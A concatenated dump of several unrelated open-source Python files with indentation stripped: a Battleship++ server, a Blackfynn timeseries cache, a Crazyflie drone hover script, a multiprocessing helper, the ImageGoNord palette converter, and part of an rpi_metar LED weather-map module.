def handle(self):
if self.request[0].decode("UTF-8") == "I_NEED_A_BATTLESHIP_PLUS_PLUS_SERVER":
socket = self.request[1]
socket.sendto("I_AM_A_BATTLESHIP_PLUS_PLUS_SERVER".encode("UTF-8"), self.client_address)
def main():
logging.basicConfig(format="%(asctime)s - SERVER - %(levelname)s - %(message)s", level=logging.DEBUG)
# parse host and port args
parser = argparse.ArgumentParser(description="battleship++ dedicated server")
parser.add_argument('host')
parser.add_argument('port', type=int)
args = parser.parse_args()
# start UPD discovery service
udpdiscovery_server = UDPServer(("", 12345), UDPDiscoveryHandler)
udpdiscovery_server_thread = threading.Thread(target=udpdiscovery_server.serve_forever)
udpdiscovery_server_thread.daemon = True
udpdiscovery_server_thread.start()
logging.debug("UDP discovery server running in thread: " + udpdiscovery_server_thread.name)
server = TCPServer((args.host, args.port), RequestHandler)
logging.info("Listening on {}:{}".format(args.host, args.port))
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
logging.debug("Server loop running in thread: " + server_thread.name)
# block until keyboard interrupt or system exit
try:
server_thread.join()
udpdiscovery_server_thread.join()
except (KeyboardInterrupt, SystemExit) as e:
logging.debug(repr(e))
# gracefully kill the server
logging.info("Server shutting down...")
server.shutdown()
server.server_close()
udpdiscovery_server.shutdown()
udpdiscovery_server.server_close()
logging.info("Bye!")
if __name__ == '__main__':
main()
|
cache.py
|
from __future__ import absolute_import, division, print_function
from builtins import filter, object, zip
import io
import multiprocessing as mp
import os
import platform
import sqlite3
import time
from datetime import datetime
from glob import glob
from itertools import groupby
from blackfynn import log
from blackfynn.extensions import numpy as np
from blackfynn.extensions import pandas as pd
from blackfynn.extensions import require_extension
from blackfynn.models import DataPackage, TimeSeriesChannel
from blackfynn.utils import usecs_since_epoch, usecs_to_datetime
from .cache_segment_pb2 import CacheSegment
logger = log.get_logger("blackfynn.cache")
def filter_id(some_id):
return some_id.replace(":", "_").replace("-", "_")
def remove_old_pages(cache, mbdiff):
# taste the rainbow!
n = int(1.5 * ((mbdiff * 1024 * 1024) / 100) / cache.page_size) + 5
# 2. Delete some pages from cache
with cache.index_con as con:
logger.debug("Cache - removing {} pages...".format(n))
# find the oldest/least accessed pages
q = """
SELECT channel,page,access_count,last_access
FROM ts_pages
ORDER BY last_access ASC, access_count ASC
LIMIT {num_pages}
""".format(
num_pages=n
)
pages = con.execute(q).fetchall()
# remove the selected pages
pages_by_channel = groupby(pages, lambda x: x[0])
for channel, page_group in pages_by_channel:
_, pages, counts, times = list(zip(*page_group))
# remove page files
cache.remove_pages(channel, *pages)
with cache.index_con as con:
con.execute("VACUUM")
logger.debug("Cache - {} pages removed.".format(n))
return n
def compact_cache(cache, max_mb):
logger.debug("Inspecting cache...")
wait = 2
current_mb = cache.size / (1024.0 * 1024)
desired_mb = 0.9 * max_mb
while current_mb > desired_mb:
logger.debug(
"Cache - current: {:02f} MB, maximum: {} MB".format(current_mb, max_mb)
)
try:
remove_old_pages(cache, current_mb - desired_mb)
except sqlite3.OperationalError:
logger.debug(
"Cache - Index DB was locked, waiting {} seconds...".format(wait)
)
if wait >= 1024:
logger.error("Cache - Unable to compact cache!")
return # silently fail
time.sleep(wait)
wait = wait * 2
current_mb = cache.size / (1024.0 * 1024)
@require_extension
def create_segment(channel, series):
segment = CacheSegment()
segment.channelId = channel.id
segment.index = series.index.astype(np.int64).values.tobytes()
segment.data = series.values.tobytes()
return segment
@require_extension
def read_segment(channel, bytes):
segment = CacheSegment.FromString(bytes)
index = pd.to_datetime(np.frombuffer(segment.index, np.int64))
data = np.frombuffer(segment.data, np.double)
series = pd.Series(data=data, index=index, name=channel.name)
return series
class Cache(object):
def __init__(self, settings):
self._conn = None
self.dir = settings.cache_dir
self.index_loc = settings.cache_index
self.write_counter = 0
# this might be replaced with existing page size (from DB)
self.page_size = settings.ts_page_size
self.settings = settings
self.init_dir()
@property
def index_con(self):
if self._conn is None:
self._conn = sqlite3.connect(self.index_loc, timeout=60)
return self._conn
def init_dir(self):
if not os.path.exists(self.dir):
os.makedirs(self.dir)
os.chmod(self.dir, 0o775)
index_dir = os.path.dirname(self.index_loc)
if not os.path.exists(index_dir):
os.makedirs(self.index_loc)
os.chmod(self.index_loc, 0o775)
def init_tables(self):
with self.index_con as con:
self.init_index_table(con)
self.init_settings_table(con)
def init_index_table(self, con):
# check for index table
q = "SELECT name FROM sqlite_master WHERE type='table' AND name='ts_pages'"
r = con.execute(q)
if r.fetchone() is None:
logger.info("Cache - Creating 'ts_pages' table")
# create index table
q = """
CREATE TABLE ts_pages (
channel CHAR(50) NOT NULL,
page INTEGER NOT NULL,
access_count INTEGER NOT NULL,
last_access DATETIME NOT NULL,
has_data BOOLEAN,
PRIMARY KEY (channel, page))
"""
con.execute(q)
def init_settings_table(self, con):
# check for settings table
q = "SELECT name FROM sqlite_master WHERE type='table' AND name='settings'"
r = con.execute(q)
if r.fetchone() is None:
logger.info("Cache - Creating 'settings' table")
# create settings table
q = """
CREATE TABLE settings (
ts_page_size INTEGER NOT NULL,
ts_format CHAR(50) NOT NULL,
max_bytes INTEGER NOT NULL,
modified DATETIME)
"""
con.execute(q)
# insert settings values
q = """
INSERT INTO settings
VALUES ({page_size}, '{format}', {max_bytes},'{time}')
""".format(
page_size=self.page_size,
format="PROTOBUF",
max_bytes=self.settings.cache_max_size,
time=datetime.now().isoformat(),
)
con.execute(q)
else:
# settings table exists
# 1. check for ts_format field (not there indicating old cache)
result = con.execute("PRAGMA table_info('settings');").fetchall()
fields = list(zip(*result))[1]
if "ts_format" not in fields:
# this means they used an older client to initalize the cache, and because
# we switched the serialization format, we'll need to refresh it.
logger.warn(
"Deprecated cache format detected - clearing & reinitializing cache..."
)
self.clear()
# 2. check page size
result = con.execute("SELECT ts_page_size FROM settings").fetchone()
if result is not None:
# page size entry exists
self.page_size = result[0]
if self.settings.ts_page_size != self.page_size:
logger.warn(
"Using existing page_size={} from DB settings (user specified page_size={})".format(
self.page_size, self.settings.ts_page_size
)
)
else:
# somehow, there is no page size entry
self.page_size = self.settings.ts_page_size
def set_page(self, channel, page, has_data):
with self.index_con as con:
q = "INSERT INTO ts_pages VALUES ('{channel}',{page},0,'{time}',{has_data})".format(
channel=channel.id,
page=page,
time=datetime.now().isoformat(),
has_data=int(has_data),
)
con.execute(q)
def set_page_data(self, channel, page, data, update=False):
has_data = False if data is None else len(data) > 0
if has_data:
# there is data, write it to file
filename = self.page_file(channel.id, page, make_dir=True)
segment = create_segment(channel=channel, series=data)
with io.open(filename, "wb") as f:
f.write(segment.SerializeToString())
self.page_written()
try:
if update:
# modifying an existing page entry
self.update_page(channel, page, has_data)
else:
# adding a new page entry
self.set_page(channel, page, has_data)
except sqlite3.OperationalError:
logger.warn("Indexing DB inaccessible, resetting connection.")
if self._conn is not None:
self._conn.close()
self._conn = None
except sqlite3.IntegrityError:
# page already exists - ignore
pass
def check_page(self, channel, page):
"""
Does page exist in cache?
"""
with self.index_con as con:
q = """ SELECT page
FROM ts_pages
WHERE channel='{channel}' AND page={page}
""".format(
channel=channel.id, page=page
)
r = con.execute(q).fetchone()
return r is not None
def page_has_data(self, channel, page):
with self.index_con as con:
q = """
SELECT has_data
FROM ts_pages
WHERE channel='{channel}' AND page={page}
""".format(
channel=channel.id, page=page
)
r = con.execute(q).fetchone()
return None if r is None else bool(r[0])
@require_extension
def get_page_data(self, channel, page):
has_data = self.page_has_data(channel, page)
if has_data is None:
# page not present in cache
return None
elif not has_data:
# page is empty
return pd.Series([], index=pd.core.index.DatetimeIndex([]))
# page has data, let's get it
filename = self.page_file(channel.id, page, make_dir=True)
if os.path.exists(filename):
# get page data from file
with io.open(filename, "rb") as f:
series = read_segment(channel, f.read())
# update access count
self.update_page(channel, page, has_data)
return series
else:
# page file has been deleted recently?
logger.warn("Page file not found: {}".format(filename))
return None
def update_page(self, channel, page, has_data=True):
with self.index_con as con:
q = """
UPDATE ts_pages
SET access_count = access_count + 1,
last_access = '{now}',
has_data = {has_data}
WHERE channel='{channel}' AND page='{page}'
""".format(
channel=channel.id,
page=page,
has_data=int(has_data),
now=datetime.now().isoformat(),
)
con.execute(q)
def page_written(self):
# cache compaction?
self.write_counter += 1
if self.write_counter > self.settings.cache_inspect_interval:
self.write_counter = 0
self.start_compaction()
def start_compaction(self, background=True):
if background:
# spawn cache compact job
p = mp.Process(
target=compact_cache, args=(self, self.settings.cache_max_size)
)
p.start()
else:
compact_cache(self, self.settings.cache_max_size)
def remove_pages(self, channel_id, *pages):
# remove page data files
for page in pages:
filename = self.page_file(channel_id, page)
if os.path.exists(filename):
os.remove(filename)
try:
os.removedirs(os.path.dirname(filename))
except os.error:
# directory not empty
pass
# remove page index entries
with self.index_con as con:
q = """
DELETE
FROM ts_pages
WHERE channel = '{channel}' AND page in ({pages})
""".format(
channel=channel_id, pages=",".join(str(p) for p in pages)
)
con.execute(q)
def page_file(self, channel_id, page, make_dir=False):
"""
Return the file corresponding to a timeseries page (stored as serialized protobuf).
"""
filedir = os.path.join(self.dir, filter_id(channel_id))
if make_dir and not os.path.exists(filedir):
os.makedirs(filedir)
filename = os.path.join(filedir, "page-{}.bin".format(page))
return filename
def clear(self):
import shutil
if self._conn is not None:
with self.index_con as con:
# remove page entries
con.execute("DELETE FROM ts_pages;")
con.commit()
self._conn.close()
self._conn = None
try:
# delete index file
os.remove(self.index_loc)
except:
logger.warn("Could not delete index file: {}".format(self.index_loc))
shutil.rmtree(self.dir, ignore_errors=True)
# reset
self.init_dir()
self.init_tables()
@property
def page_files(self):
return glob(os.path.join(self.dir, "*", "*.bin"))
@property
def size(self):
"""
Returns the size of the cache in bytes
"""
all_files = self.page_files + [self.index_loc]
return sum(os.stat(x).st_size for x in all_files)
def get_cache(settings, start_compaction=False, init=True):
cache = Cache(settings)
if start_compaction:
background = platform.system().lower() != "windows"
cache.start_compaction(background=background)
if init:
cache.init_tables()
return cache
|
Hover.py
|
#!/usr/bin/env python
import rospy
import tf
from crazyflie_driver.msg import Hover
from std_msgs.msg import Empty
from crazyflie_driver.srv import UpdateParams
from threading import Thread
class Crazyflie:
def __init__(self, prefix):
self.prefix = prefix
worldFrame = rospy.get_param("~worldFrame", "/world")
self.rate = rospy.Rate(10)
rospy.wait_for_service(prefix + '/update_params')
rospy.loginfo("found update_params service")
self.update_params = rospy.ServiceProxy(prefix + '/update_params', UpdateParams)
self.setParam("kalman/resetEstimation", 1)
self.pub = rospy.Publisher(prefix + "/cmd_hover", Hover, queue_size=1)
self.msg = Hover()
self.msg.header.seq = 0
self.msg.header.stamp = rospy.Time.now()
self.msg.header.frame_id = worldFrame
self.msg.yawrate = 0
self.stop_pub = rospy.Publisher(prefix + "/cmd_stop", Empty, queue_size=1)
self.stop_msg = Empty()
# determine direction of speed based on distance
def getSpeed(self, distance):
if distance > 0:
return 0.1
elif distance < 0:
return -0.1
else:
return 0
def setParam(self, name, value):
rospy.set_param(self.prefix + "/" + name, value)
self.update_params([name])
# x, y is the x, y distance relative to itself
# z is absolute z distance
# TODO: solve 0
def goTo (self, x, y, zDistance, yaw):
duration = 0
duration_x = 0
duration_y = 0
duration_z = 0
vx = 0
vy = 0
z = self.msg.zDistance # the zDistance we have before
z_scale = self.getSpeed(z) # the z distance each time z has to increment, will be changed
# for x, in secs
if x != 0:
duration_x = abs(x/0.1)
vx = self.getSpeed(x)
# for y, in secs
if y != 0:
duration_y = abs(y/0.1)
vy = self.getSpeed(y)
duration_z = abs(z-zDistance)/0.1
durations = [duration_x, duration_y, duration_z]
duration = max(durations)
if duration == 0:
return
elif duration == duration_x:
# x is the longest path
vy *= abs(y/x)
z_scale *= abs((z-zDistance)/x)
elif duration == duration_y:
# y is the longest path
vx *= abs(x/y)
z_scale *= abs((z-zDistance)/y)
elif duration == duration_z:
# z is the longest path
vx *= abs(x/(z-zDistance))
vy *= abs(y/(z-zDistance))
print(vx)
print(vy)
print(z_scale)
print(duration)
start = rospy.get_time()
while not rospy.is_shutdown():
self.msg.vx = vx
self.msg.vy = vy
self.msg.yawrate = 0.0
self.msg.zDistance = z
if z < zDistance:
print(zDistance)
print(z)
z += z_scale
else:
z = zDistance
now = rospy.get_time()
if (now - start > duration):
break
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
rospy.loginfo("sending...")
rospy.loginfo(self.msg.vx)
rospy.loginfo(self.msg.vy)
rospy.loginfo(self.msg.yawrate)
rospy.loginfo(self.msg.zDistance)
self.pub.publish(self.msg)
self.rate.sleep()
# take off to z distance
def takeOff(self, zDistance):
time_range = 1 + int(10*zDistance/0.4)
while not rospy.is_shutdown():
for y in range(time_range):
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = y / 25.0
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.pub.publish(self.msg)
self.rate.sleep()
for y in range(20):
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = zDistance
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.pub.publish(self.msg)
self.rate.sleep()
break
# land from last zDistance
def land (self):
# get last height
zDistance = self.msg.zDistance
while not rospy.is_shutdown():
while zDistance > 0:
self.msg.vx = 0.0
self.msg.vy = 0.0
self.msg.yawrate = 0.0
self.msg.zDistance = zDistance
self.msg.header.seq += 1
self.msg.header.stamp = rospy.Time.now()
self.pub.publish(self.msg)
self.rate.sleep()
zDistance -= 0.2
self.stop_pub.publish(self.stop_msg)
def handler(cf):
# cf.takeOff(0.4)
cf.goTo(0.2, 0.2, 0.4, 0)
cf.land()
if __name__ == '__main__':
rospy.init_node('hover', anonymous=True)
cf1 = Crazyflie("cf1")
# cf2 = Crazyflie("cf2")
t1 = Thread(target=handler, args=(cf1,))
# t2 = Thread(target=handler, args=(cf2,))
t1.start()
# t2.start()
|
parmap.py
|
from multiprocessing import Process, Pipe
from itertools import izip
import time
## from https://stackoverflow.com/questions/3288595/multiprocessing-how-to-use-pool-map-on-a-function-defined-in-a-class
def spawn(f):
def fun(pipe,x):
pipe.send(f(x))
pipe.close()
return fun
def parmap(f,X):
# b = time.time()
# print 'parmap', b
pipe=[Pipe() for x in X]
proc=[Process(target=spawn(f),args=(c,x)) for x,(p,c) in izip(X,pipe)]
# print 'pipe created', time.time()-b
[p.start() for p in proc]
[p.join() for p in proc]
return [p.recv() for (p,c) in pipe]
# if __name__ == '__main__':
# print parmap(lambda x:x**x,range(1,5))
|
GoNord.py
|
import base64
import os
from io import BytesIO
from math import ceil
import threading
from PIL import Image, ImageFilter
try:
import importlib.resources as pkg_resources
except ImportError:
# Try backported to PY<37 `importlib_resources`.
import importlib_resources as pkg_resources
from .palettes import Nord as nord_palette
from ImageGoNord.utility.quantize import quantize_to_palette
import ImageGoNord.utility.palette_loader as pl
from ImageGoNord.utility.ConvertUtility import ConvertUtility
class NordPaletteFile:
"""
A class used to map the nord color-scheme into files.
Each file contains the hex of colors
...
Attributes
----------
AURORA : str
Aurora color-palette
FROST : str
Frost color-palette
POLAR_NIGHT : str
Polar night color-palette
SNOW_STORM : str
Snow Storm color-palette
"""
AURORA = "Aurora.txt"
FROST = "Frost.txt"
POLAR_NIGHT = "PolarNight.txt"
SNOW_STORM = "SnowStorm.txt"
class GoNord(object):
"""
A class used for converting image to the nord palette
It can be used also for converting image to other palette by loading different palette
This class need Pillow and apply 3 different palette conversion algorithm:
- replace pixel by avg area pixel
- replace pixel by pixel
- apply a filter by using pillow features
Attributes
----------
PALETTE_LOOKUP_PATH : str
path to look for finding the palette files (.txt)
USE_GAUSSIAN_BLUR : bool
enable or disable the blur (in output)
USE_AVG_COLOR : bool
enable or disable avg algorithm
AVG_BOX_DATA : dict
params (width and height) of the avg area to be considered
AVAILABLE_PALETTE : list
loaded palette list
PALETTE_DATA : dict
available palette data in hex : rgb format
Methods
-------
set_palette_lookup_path(self, path)
Set the base_path for the palette folder
set_default_nord_palette(self)
Set available palette as the default palette
get_palette_data(self)
Build the palette data from configuration
add_color_to_palette(self, hex_color)
Add hex color to current palette
reset_palette(self)
Reset the available_palette prop
add_file_to_palette(self, file)
Append a custom file to the available palette
enable_gaussian_blur(self)
Enable blur filter
disable_gaussian_blur(self)
disabled blur filter
open_image(self, path)
Load an image using Pillow utility
resize_image(self, image, w=0, h=0)
Resize an image using Pillow utility
image_to_base64(self, image, extension)
Convert a Pillow image to base64 string
base64_to_image(self, img_b64)
Convert a base64 string to a Pillow image
load_pixel_image(self, opened_image)
Load the pixel map of a given Pillow image
enable_avg_algorithm(self)
Enable avg algorithm
disable_avg_algorithm(self)
Disabled avg algorithm
set_avg_box_data(self, w=-2, h=3)
Set the dimension of the AVG area box to use
quantize_image(self, image, save_path='')
Quantize a Pillow image by applying the available palette
convert_image(self, image, palettedata, save_path='')
Process a Pillow image by replacing pixel or by avg algorithm
save_image_to_file(self, image, path)
Save a Pillow image to file
"""
DEFAULT_PALETTE_PATH = '../palettes/Nord/'
if (os.path.exists('../palettes/Nord/') == False):
pa = pkg_resources.open_text(nord_palette, NordPaletteFile.AURORA)
DEFAULT_PALETTE_PATH = os.path.dirname(nord_palette.__file__) + '/'
PALETTE_LOOKUP_PATH = DEFAULT_PALETTE_PATH
USE_GAUSSIAN_BLUR = False
USE_AVG_COLOR = False
AVG_BOX_DATA = {"w": -2, "h": 3}
TRANSPARENCY_TOLERANCE = 190
MAX_THREADS = 10
AVAILABLE_PALETTE = []
PALETTE_DATA = {}
def __init__(self):
"""Constructor: init variables & config"""
self.set_default_nord_palette()
self.set_avg_box_data()
def set_palette_lookup_path(self, path):
"""Set the base_path for the palette folder"""
self.PALETTE_LOOKUP_PATH = path
def set_default_nord_palette(self):
"""Set available palette as the default palette"""
self.AVAILABLE_PALETTE = [
NordPaletteFile.POLAR_NIGHT,
NordPaletteFile.SNOW_STORM,
NordPaletteFile.FROST,
NordPaletteFile.AURORA,
]
def get_palette_data(self):
"""
Build the palette data from configuration
Returns
-------
dict
The palette data: keys are hex color code, values are rgb values
"""
for palette_file in self.AVAILABLE_PALETTE:
hex_colors = pl.import_palette_from_file(
self.PALETTE_LOOKUP_PATH + palette_file)
for hex_color in hex_colors:
self.PALETTE_DATA[hex_color] = pl.export_tripletes_from_color(
hex_color)
# Delete empty lines, if they exist.
if self.PALETTE_DATA.get('') and len(self.PALETTE_DATA['']) == 0:
del self.PALETTE_DATA['']
return self.PALETTE_DATA
def add_color_to_palette(self, hex_color):
self.PALETTE_DATA[hex_color[1:]] = pl.export_tripletes_from_color(hex_color[1:])
def reset_palette(self):
"""Reset available palette array"""
self.AVAILABLE_PALETTE = []
self.PALETTE_DATA = {}
def add_file_to_palette(self, file):
"""Method for adding file to the available palette"""
self.AVAILABLE_PALETTE.append(file)
self.get_palette_data()
def set_transparency_tolerance(self, tolerance):
"""Method for changing the alpha tolerance"""
self.TRANSPARENCY_TOLERANCE = int(tolerance)
def enable_gaussian_blur(self):
"""Enable gaussian blur on the output img"""
self.USE_GAUSSIAN_BLUR = True
def disable_gaussian_blur(self):
"""Disable gaussian blur on the output img"""
self.USE_GAUSSIAN_BLUR = False
def open_image(self, path):
"""
Load an image using Pillow utility
Parameters
----------
path : str
the path and the filename where to save the image
Returns
-------
pillow image
opened image
"""
opened_image = Image.open(path)
if (type(opened_image.getpixel((0,0))) == int):
opened_image = opened_image.convert('RGB')
return opened_image
def resize_image(self, image, size=(0, 0)):
"""
Resize an image using Pillow utility
Parameters
----------
image : pillow image
The source pillow image
:param size:
(width, height) of returning image, using half image size if not specified
Returns
-------
pillow image
resized image
"""
if len(size) == 2 and all(size):
return image.resize(size)
w, h = image.size
half_size = (round(w / 2), round(h / 2))
return image.resize(half_size)
def image_to_base64(self, image, extension):
"""
Convert a Pillow image to base64 string
Available extension: https://pillow.readthedocs.io/en/stable/handbook/image-file-formats.html
Parameters
----------
image : pillow image
The source pillow image
extension : str
The extension of the source image (mandatory)
Returns
-------
pillow image
processed image
"""
im_file = BytesIO()
image.save(im_file, format=extension)
im_bytes = im_file.getvalue()
return base64.b64encode(im_bytes)
def base64_to_image(self, img_b64):
"""
Convert a base64 string to a Pillow image
Parameters
----------
img_b64 : str
The base64 string representation of the image
Returns
-------
pillow image
The converted image from base64
"""
im_bytes = base64.b64decode(img_b64)
im_file = BytesIO(im_bytes)
return self.open_image(im_file)
def load_pixel_image(self, opened_image):
"""
Load the pixel map of a given Pillow image
Parameters
----------
image : pillow image
The source pillow image
Returns
-------
pillow image
pixel map of the opened image
"""
return opened_image.load()
def enable_avg_algorithm(self):
"""
Enabled avg algorithm
"""
self.USE_AVG_COLOR = True
def disable_avg_algorithm(self):
"""
Disabled avg algorithm
"""
self.USE_AVG_COLOR = False
def set_avg_box_data(self, w=-2, h=2):
"""
Set the dimension of the AVG area box to use
Parameters
----------
w : int
Box's width
h : int
Box's height
"""
self.AVG_BOX_DATA['w'] = w
self.AVG_BOX_DATA['h'] = h
def quantize_image(self, image, fill_color='2E3440', save_path=''):
"""
Quantize a Pillow image by applying the available palette
Parameters
----------
image : pillow image
The source pillow image
fill_color: str
Default fill color as foreground
save_path : str, optional
the path and the filename where to save the image
Returns
-------
pillow image
quantized image
"""
data_colors = pl.create_data_colors(self.get_palette_data())
while len(data_colors) < 768:
data_colors.extend(pl.export_tripletes_from_color(fill_color))
palimage = Image.new('P', (1, 1))
palimage.putpalette(data_colors)
quantize_img = quantize_to_palette(image, palimage)
if (save_path != ''):
self.save_image_to_file(quantize_img, save_path)
return quantize_img
def converted_loop(self, is_rgba, pixels, original_pixels, maxRow, maxCol, minRow=0, minCol=0):
color_checked = {}
for row in range(minRow, maxRow, 1):
for col in range(minCol, maxCol, 1):
try:
color_to_check = pixels[row, col]
except Exception:
continue
if (is_rgba):
if (color_to_check[3] < self.TRANSPARENCY_TOLERANCE):
continue
if self.USE_AVG_COLOR == True:
# todo: improve this feature in performance
color_to_check = ConvertUtility.get_avg_color(
pixels=original_pixels, row=row, col=col, w=self.AVG_BOX_DATA['w'], h=self.AVG_BOX_DATA['h'])
# saving in memory every checked color to improve performance
key_color_checked = ','.join(str(e) for e in list(color_to_check))
if (key_color_checked in color_checked):
difference = color_checked[key_color_checked]
else:
differences = [[ConvertUtility.color_difference(color_to_check, target_value), target_name]
for target_name, target_value in self.PALETTE_DATA.items()]
differences.sort()
difference = differences[0][1]
color_checked[key_color_checked] = difference
colors_list = self.PALETTE_DATA[difference]
if (is_rgba and len(colors_list) == 3):
colors_list.append(color_to_check[3])
pixels[row, col] = tuple(colors_list)
return pixels
def convert_image(self, image, save_path='', parallel_threading=False):
"""
Process a Pillow image by replacing pixel or by avg algorithm
Parameters
----------
image : pillow image
The source pillow image
save_path : str, optional
the path and the filename where to save the image
Returns
-------
pillow image
processed image
"""
self.get_palette_data()
original_image = image.copy()
original_pixels = self.load_pixel_image(original_image)
original_image.close()
pixels = self.load_pixel_image(image)
is_rgba = (image.mode == 'RGBA')
if (parallel_threading == False):
self.converted_loop(is_rgba, pixels, original_pixels, image.size[0], image.size[1])
else:
step = ceil(image.size[0] / self.MAX_THREADS)
threads = []
for row in range(step, image.size[0] + step, step):
args = (is_rgba, pixels, original_pixels, row, image.size[1], row - step, 0)
t = threading.Thread(target=self.converted_loop, args=args)
t.daemon = True
t.start()
threads.append(t)
for t in threads:
t.join(timeout=30)
if (self.USE_GAUSSIAN_BLUR == True):
image = image.filter(ImageFilter.GaussianBlur(1))
if (save_path != ''):
self.save_image_to_file(image, save_path)
return image
def save_image_to_file(self, image, path):
"""
Save a Pillow image to file
Parameters
----------
image : pillow image
The source pillow image
path : str
the path and the filename where to save the image
"""
image.save(path)
|
core.py
|
#!/usr/bin/env python
import enum
import requests
import logging
import logging.handlers
import os
import socket
import signal
import sys
import time
import threading
from configparser import ConfigParser
from rpi_ws281x import PixelStrip
from rpi_metar import cron, sources, encoder
from rpi_metar.airports import Airport, LED_QUEUE, MAX_WIND_SPEED_KTS, Legend
from rpi_metar import wx
from rpi_metar import leds as colors
from queue import Queue
log = logging.getLogger(__name__)
METAR_REFRESH_RATE = 5 * 60 # How often METAR data should be fetched, in seconds
WIND_DISPLAY_RATE = 5 # How often to show that it's windy, in seconds
LIGHTNING_STRIKE_RATE = 5 # How regularly should lightning strike, in seconds
FAILURE_THRESHOLD = 3 # How many times do we not get data before we reboot
ENCODER_QUEUE = Queue()
METAR_QUEUE = Queue()
ENCODER_EVENT = threading.Event()
METAR_EVENT = threading.Event()
# A collection of the airports we'll ultimately be tracking.
AIRPORTS = {}
def is_internet_up():
try:
response = requests.get('http://google.com', timeout=10.0)
response.raise_for_status()
except: # noqa
return False
return True
def fetch_metars(queue, cfg):
"""Fetches new METAR information periodically."""
failure_count = 0
# Load the desired data sources from the user configuration.
srcs = cfg.get('settings', 'sources', fallback='NOAA,NOAABackup,SkyVector').split(',')
srcs = [getattr(sources, src.strip()) for src in srcs]
while True:
metars = {}
# Allow duplicate LEDs by only using the first 4 chars as the ICAO. Anything else after it helps keep it unique.
airport_codes = set([code[:4] for code in AIRPORTS.keys()])
for source in srcs:
try:
data_source = source(list(airport_codes), config=cfg)
except: # noqa
log.exception('Unable to create data source.')
continue
try:
info = data_source.get_metar_info()
log.info('Retrieved: %s', info)
metars.update(info)
failure_count = 0
except: # noqa
log.exception('Failed to retrieve metar info.')
# We have retrieved METAR info, but did we get responses for all stations? If we did
# not, let's request those missing stations from the other sources. Perhaps they have
# the info!
airport_codes = airport_codes - set(metars.keys())
if not airport_codes:
# Nothing else needs to be retrieved
break
# We have exhausted the list of sources.
if not metars:
metars = None
# Some of the raspberry pis lose their wifi after some time and fail to automatically
# reconnect. This is a workaround for that case. If we've failed a lot, just reboot.
# We do need to make sure we're not rebooting too soon (as would be the case for
# initial setup).
failure_count += 1
# If other web services are available, it's just the NOAA site having problems so we
# don't need to reboot.
if failure_count >= FAILURE_THRESHOLD and not is_internet_up():
log.warning('Internet is not up, rebooting.')
os.system('reboot')
queue.put(metars)
time.sleep(cfg.getint('settings', 'metar_refresh_rate', fallback=METAR_REFRESH_RATE))
def process_metars(queue, leds):
"""Converts METAR info info Flight Categories and updates the LEDs."""
airports = AIRPORTS.values()
# When the system first starts up, waiting for all of the LEDs to fade into their correct
# colors can take a very long time. To mitigate this, we'll just slam the colors into place
# if this is the first time this thread is executing.
first = True
while True:
try:
metars = queue.get()
if metars is None:
for airport in airports:
airport.category = wx.FlightCategory.UNKNOWN
continue
for airport in airports:
airport.process_metar(metars)
if first:
leds.setPixelColor(airport.index, airport.category.value)
if first:
first = False
leds.show()
# Let the weather checkers know the info is refreshed
METAR_EVENT.set()
log.info(sorted(AIRPORTS.values(), key=lambda x: x.index))
except: # noqa
log.exception('metar processor error')
def render_leds(queue, leds, cfg):
"""Updates the LED strand when something pops onto the queue."""
while True:
log.info('waiting for queue.')
airport_code = queue.get()
log.info('got {}'.format(airport_code))
airport = AIRPORTS[airport_code.upper()]
# This is our target color.
color = airport.category.value
if not cfg.getboolean('settings', 'do_fade', fallback=True):
leds.setPixelColor(airport.index, color)
leds.show()
continue
# Let's try to fade to our desired color
start_color = leds.getPixelColor(airport.index)
start_g = start_color >> 16 & 0xff
start_r = start_color >> 8 & 0xff
start_b = start_color & 0xff
end_g = color >> 16 & 0xff
end_r = color >> 8 & 0xff
end_b = color & 0xff
with leds.lock: # Don't let lightning or wind interrupt us.
while((start_r != end_r) or (start_g != end_g) or (start_b != end_b)):
if start_r < end_r:
start_r += 1
elif start_r > end_r:
start_r -= 1
if start_g < end_g:
start_g += 1
elif start_g > end_g:
start_g -= 1
if start_b < end_b:
start_b += 1
elif start_b > end_b:
start_b -= 1
leds.setPixelColorRGB(airport.index, start_g, start_r, start_b)
leds.show()
def lightning(leds, event, cfg):
"""Briefly changes LEDs to white, indicating lightning in the area."""
airports = AIRPORTS.values()
strike_duration = cfg.getfloat('settings', 'lightning_duration', fallback=1.0)
legend = cfg.getint('legend', 'lightning', fallback=None)
legend = [Legend('LIGHTNING', legend, wx.FlightCategory.OFF)] if legend is not None else []
while True:
# Which airports currently are experiencing thunderstorms
ts_airports = [airport for airport in airports if airport.thunderstorms] + legend
log.debug("LIGHTNING @: {}".format(ts_airports))
if ts_airports:
with leds.lock:
for airport in ts_airports:
leds.setPixelColor(airport.index, wx.FlightCategory.THUNDERSTORM.value)
leds.show()
time.sleep(strike_duration)
for airport in ts_airports:
leds.setPixelColor(airport.index, airport.category.value)
leds.show()
time.sleep(LIGHTNING_STRIKE_RATE - strike_duration)
else:
# Sleep until the next metar refresh...
event.wait(cfg.getint('settings', 'metar_refresh_rate', fallback=METAR_REFRESH_RATE))
event.clear()
def wind(leds, event, cfg):
"""Briefly changes LEDs to yellow, indicating it's too windy."""
airports = AIRPORTS.values()
indicator_duration = cfg.getfloat('settings', 'wind_duration', fallback=1.0)
legend = cfg.getint('legend', 'wind', fallback=None)
legend = [Legend('WIND', legend, wx.FlightCategory.OFF)] if legend is not None else []
while True:
# Which locations are currently breezy
windy_airports = [airport for airport in airports if airport.windy] + legend
log.debug('WINDY @: {}'.format(windy_airports))
if windy_airports:
# We want wind indicators to appear simultaneously.
with leds.lock:
for airport in windy_airports:
leds.setPixelColor(airport.index, wx.FlightCategory.WINDY.value)
leds.show()
time.sleep(indicator_duration)
for airport in windy_airports:
leds.setPixelColor(airport.index, airport.category.value)
leds.show()
time.sleep(WIND_DISPLAY_RATE - indicator_duration)
else:
event.wait(cfg.getint('settings', 'metar_refresh_rate', fallback=METAR_REFRESH_RATE))
event.clear()
def set_all(leds, color=colors.BLACK):
"""Sets all leds to a specific color."""
for i in range(leds.numPixels()):
leds.setPixelColor(i, color)
leds.show()
def load_configuration():
cfg_files = ['/etc/rpi_metar.conf', './rpi_metar.conf']
